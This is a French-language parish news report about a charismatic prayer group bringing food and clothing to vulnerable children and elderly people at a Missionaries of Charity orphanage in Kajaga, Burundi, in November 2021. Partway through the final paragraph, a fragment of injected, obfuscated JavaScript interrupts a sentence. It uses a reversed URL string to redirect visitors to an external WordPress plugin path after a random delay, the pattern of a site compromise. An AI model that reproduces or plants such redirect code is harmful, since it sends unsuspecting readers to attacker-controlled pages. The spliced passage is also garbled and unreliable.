Sa Sainteté, le Pape François a proclamé que le 14 Novembre de chaque année sera l’occasion pour tous les fidèles de l’Eglise Catholique du monde entier de soutenir les personnes les plus vulnérables vivants dans leurs localités.

C’est dans ce but que le Renouveau Charismatique Catholique de Mont Sion Gikungu a organisé ce dimanche, le 14 novembre 2021 une bonne action envers les personnes vulnérables et les personnes les plus démunies qui habitent dans le centre d’orphelinat des Missionnaires de la Charité sis au quartier Kajaga de la Commune MUTIMBUZI.

Le Renouveau Charismatique Catholique leur a amené les vivres et les habits pour les enfants ainsi que de la nourriture pour les autres groupes composés des hommes et femmes en âge avancé, les jeunes garçons et filles qui prennent avec soins ces petits enfants ainsi que ces vieux ci-haut cités. Arrivés sur terrain, c’était une grande joie qui se manifestait aux yeux des sœurs qui les hébergent ainsi que ces personnes vulnérables visitées.

Prenant la parole, la Sœur qui représente les autres a vivement remercié le groupe de prière qui est le Renouveau Charismatique pour cette bonne initiative de leur venir en aide. C’est un signe d’amour de choisir ce centre parmi les autres centres se trouvant dans la Mairie de Bujumbura. Elle a encore remercié le Sanctuaire de la Paix et la Réconciliation de Mont Sion Gikungu de les avoir mandatés pour faire cette action très charitable.

Ainsi, les deux camps ( les visiteurs et les gens du Centre) ont exprimé leur joie en entonnant des chants de louange et un représentant des vieux parents hébergés dans ce centre d’orphelinat a pris la parole pour extérioriser la joie qui s’observe sur leurs yeux et a salué cet acte charitable manifesté envers eux.

Quant au Berger du Renouveau Charismatique, Monsieur Mujojoma Diomède, a pris la parole en remerciant toutes les parties qui ont pris la parole et leur a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné l’espoir que Dieu va rester à leur côté, qu’il faut croire en Dieu seul qui sauve et qui sait tout. Un remerciement envers toute la congrégation des Sœurs de Charité pour cette bonne initiative qu’elle a entreprise de rassembler toutes ces personnes vulnérables malgré leur moyen limité.

NIMBONA Frédéric